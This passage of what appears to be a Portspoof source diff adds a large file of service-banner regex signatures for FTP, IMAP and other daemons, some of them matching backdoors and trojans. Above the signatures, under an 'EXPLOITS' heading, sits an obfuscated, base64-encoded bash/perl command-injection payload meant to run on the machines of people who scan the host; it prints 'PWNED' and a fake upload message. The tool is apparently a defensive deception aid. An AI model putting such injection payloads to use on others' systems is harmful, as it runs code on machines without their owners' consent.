" + +## EXPLOITS ## + +#OS cmd injection payload for bash: $(cat output) and `cat output` injections +8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;" diff --git a/tools/portspoof_signatures b/tools/portspoof_signatures new file mode 100755 index 0000000..73895a3 --- /dev/null +++ b/tools/portspoof_signatures @@ -0,0 +1,65535 @@ +S\xf5\xc6\x1a{ +\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) +.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 +\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n +200 NOD32SS ([\d.]+) \((\d+)\)\r\n + +\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 +\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 +\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 +MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 +Asterisk Call Manager/([\d.]+)\r\n +Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n +220 jeem\.mail\.pv ESMTP\r\n +\r\nUser Access Verification\r\n\r\nYour PassWord: +echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe +220 Bot Server \(Win32\)\r\n +PWD +=+\n= +RBackdoor ([\d.]+) +220 Windrone Server \(Win32\)\r\n +220 Reptile welcomes you\.\.\r\n +MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. +220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n +A-311 Death welcome\x001 +\x01\0\0\0 +HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n +0x[0-9a-fA-F]{32}L +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 +\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 +BZFS\d\d\d\d\r\n\r\n +ACK\x01 +\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 +\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\*\x01..\0\x04\0\0\0\x01 +Cirrato Client ([\w._-]+)\0 +200.*Citadel(?:/UX)? +\x7f\x7fICA\0\x7f\x7fICA\0 +.\0\0\0\x81\0\0\0\x01 +\0\0\0\x10ClsBoolVersion 1 +CFMSERV\(1\)\n +Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 +Crestron Terminal Protocol Console opened\r\n +\r\nCrestron Terminal Protocol Console Opened\r\n\r\n +\x0f\0\x01\x02 +/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n +\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n +\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n +\xaf\x01 +220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) +0000019a[0-9a-f]{402}\r\n +220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n +\0\0\0\x0c\0\0\0\?\0\0\0\x02 +0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL +\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B +\(m\xe9l@k\xb7\xf5\x03 +\(m\xe9l@k\xb3\xf7\x1e\xa5 +\(m\xe9l@k\xb1\xf1\x15\xa5 +\?\x008 \xc3p EFTSRV1 ([\d.]+) +\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n +7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp +Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n +\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: +Welcome to FreeVCS MSSQL NT Service\r\n +Welcome to FreeVCS DBISAM NT Service\r\n +FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n +220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n +220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n +220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n +530 Connection refused, unknown IP address\.\r\n +220 IIS ([\w._-]+) FTP\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n +220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n +220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n +500 OOPS: (could not bind listening IPv4 socket)\r\n +500 OOPS: vsftpd: (.*)\r\n +220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n +220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n +220-FileZilla Server\r\n +431 Could not initialize SSL connection\r\n +220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n +220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n +220 AXIS (.+) FTP Network Print Server V([-\w_.]+) +220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n +220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n +220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n +220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n +220[ -]Serv-U FTP[ -]Server v([\w._-]+) +220-Serv-U FTP Server for Winsock\r\n +220-FTP Server v([\d.]+) for WinSock ready\. +431 Unable to negotiate secure command connection\.\r\n +220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n +220 JD FTP Server Ready +220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n +220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n +220 ProFTPD (\d\S+) Server +220 FTP Server \[([-\w_.]+)\]\r\n +220.*ProFTP[dD].*Server ready +220 ProFTP Server Ready\r\n +220 Welcome @ my\.ftp\.org\r\n +220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n +220 ProFTP-Server auf ([-\w_.]+)\r\n +220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) +220 FTP Server ready\.\r\n +220.*NcFTPd Server +220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready +220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd +220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n +220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS +220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n +220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n +220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users +220 Service Ready for new User\r\n +220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n +220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n +220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n +220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n +220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n +(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X +220 WinGate Engine FTP Gateway ready\r\n +220 Welcome to Quick 'n Easy FTP Server\r\n +421 Too many connections for this IP address, please try again later\.\r\n +220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n +500 OOPS: .*\r\n +500 OOPS: vsftpd: both local and anonymous access disabled!\r\n +220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n +220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n +220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n +220 CesarFTP ([\w.]+) Server Welcome !\r\n +220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n +220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n +220 netapp ftp server\r\n +220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 +220 ([\w._-]+) FTP server ready\.\.\.\r\n +220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n +220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n +220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n +220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n +220 PV11 FTP Server ready\r\n +220 Alize Session Manager FTP Server\r\n +220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n +220 DataHive FTP Server ([\d.]+) Ready\.\r\n +220 copier2FTP server ready\.\r\n +220 DrayTek FTP version ([\d.]+)\r\n +220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n +220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n +220 Dell Laser Printer 3100cn\r\n +220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n +220 Welcome to the dvd2xbox ftp server\.\r\n +220 Welcome To WinEggDrop Tiny FTP Server\r\n +220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n +220 wzd server ready\.\r\n +500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n +220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n +220 Connected to ([-\w_.]+) ready\.\.\.\r\n +220 NETWORK HDD FTP Server ready\.\r\n +220 Blue Coat FTP Service\r\n +220 Homer Ftp Server\r\n +220 Personal FTP Server ready\r\n +220 Golden FTP Server PRO ready v([\w._-]+)\r\n +220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 +220 AudioVAULT FTP server\r\n +220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n +220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n +220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd +220 Cisco \(([\d.]+)\) FTP server ready\r\n +220 \"Global Site Selector FTP\"\r\n +220 Willkomen auf Ihrer Dreambox\.\r\n +Error loading /etc/ssl/certs/ftpd\.pem: +220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n +220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n +220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n +220 IB-23 Ver ([\d.]+) FTP server\.\r\n +220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n +refused in\.ftpd from [-\w_.]+ logged\n +220 Xlight Server ([\d.]+) ready\.\.\. \r\n +220 FS-3820N FTP server\.\r\n +220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n +220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n +220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n +ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n +220 Canon iN-E5 FTP Print Server V([-\w_.]+) +220 FTP-Backupspace\r\n +220 zFTPServer v([-\w_.]+), build ([-\d]+) +220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n +220 FTP Server, type 'quote help' for help\r\n +550 no more people, max connections is reached\r\n +220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n +220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n +220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n +220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) +220 FTP server: Lexmark Optra LaserPrinter ready\r\n +220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n +220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n +220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n +220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) +.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n +220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) +220 Welcome to Ocean FTP Server. +220 4dftp .* FTP Service \(Version ([^)]+)\) +220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd +220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n +421 Closing non-secure connections in Secure Mode\. \r\n +220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n +220 Conti FTP Server ready\r\n +220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd +220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd +220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n +220 Welcome to the NSLU2 vsftp daemon\.\r\n +220 Star IFBD-HE05/06 FTP Server\.\r\n +220 Welcome to Baby FTP Server\r\n +220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n +220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n +220 ALFTP Server ready\. \^-\^\)/~\r\n +220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n +220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n +220 aFTPServer ready \(cwd is /\)\r\n +220 FTP version ([\w.]+)\r\n +220 pyftpdlib ([\w._-]+) ready\.\r\n +220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n +220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n +220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n +220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n +220 OpenFTPD server([^ ]+)? +220 Ftp service of Jana-Server ready\r\n +220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n +501 Proxy unable to contact ftp server\r\n +220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220-Sidewinder ftp proxy\. You must login to the proxy first +220 webshield2 FTP proxy ready\.\r\n +220 WinProxy \(Version ([^)]+)\) ready\.\r\n +220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n +220 Finjan SurfinGate Proxy - Server Ready\.\r\n +220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n +500 WinGate Engine Access Denied\r\n +220 IWSS FTP proxy ready\r\n +220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n +220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n +220-CCProxy FTP Service\(Unregistered\)\r\n +220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n +220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n +220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n +421 Service not available \(The FTP server is not responding\.\)\n +220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); +220-\r?\n220 - ftp +\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ +\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r +220 Fyre rendering server ready\n +\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h +HELLO_BOT\r\n +HELLO_CONTROL_SERVER\r\n +\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n +%%QU%%QU%%QU +\nClient limit exceeded\.\n +3Connection to [\d.]+ is denied -- no authorization\.\r\n +GIOP\x01...\0\0\0\0 +\x03\0\0.*@ +\xff\xfd.| p|GNU Gatekeeper +Helpdesk Advanced ([\d.]+) License Logging Service +\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 +HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

+HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} +220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n +220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 +00 +01 +\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== +IceP\x01\0\x01\0\x03\0\x0e\0\0\0 +flock\(\) on closed filehandle .*midentd +\"\0\x04\0 +IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at +\* OK GroupWise IMAP4rev1 Server Ready\r\n +\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n +\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n +\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready +\* OK IMAP4 Server \(IMail ([-.\w]+)\) +\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd +\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n +\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n +\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n +\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n +\* OK [Dd]ovecot MUA ready\r\n +\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] +\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n +\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n +\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n +\* OK AVM KEN!4 IMAP Server ready\r\n +\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n +\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n +\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n +\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n +\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n +\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n +\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu +\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n +\* OK Welcome to Binc IMAP v(\d[-.\w]+) +\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n +\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n +\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n +\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n +\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK Softalk IMAP Server ready\r\n +\* OK Welcome to Binc IMAP +\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n +\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n +\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n +\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n +\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n +\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n +\* OK IMAP4rev1 Service at Jana-Server ready\r\n +\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n +\* OK CommuniGate Pro IMAP Server ready\r\n +\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n +\+OK X1 ([-\w_.]+)\r\n +\* OK IMAP4rev1 SmarterMail\r\n +\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n +\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n +\* OK .* GoMail V([-\w_.]+) IMAP4rev1 +\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n +\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n +\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n +\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at +\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n +\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready +\* OK Dovecot DA ready\.\r\n +\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 +\* BYE Hi This is the IMAP SSL Redirect\r\n +\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n +\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n +\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at +\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n +\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n +\* OK ([-\w_.]+) IMAP server ready\r\n +\* OK IMAP4 proxy ready\r\n +\* OK imapfront ready\. \+ portspoof\r\n +\* OK avast! IMAP Proxy\r\n +\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n +\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n +\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n +Protocol Error: XML data is not well-formed\. +\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ 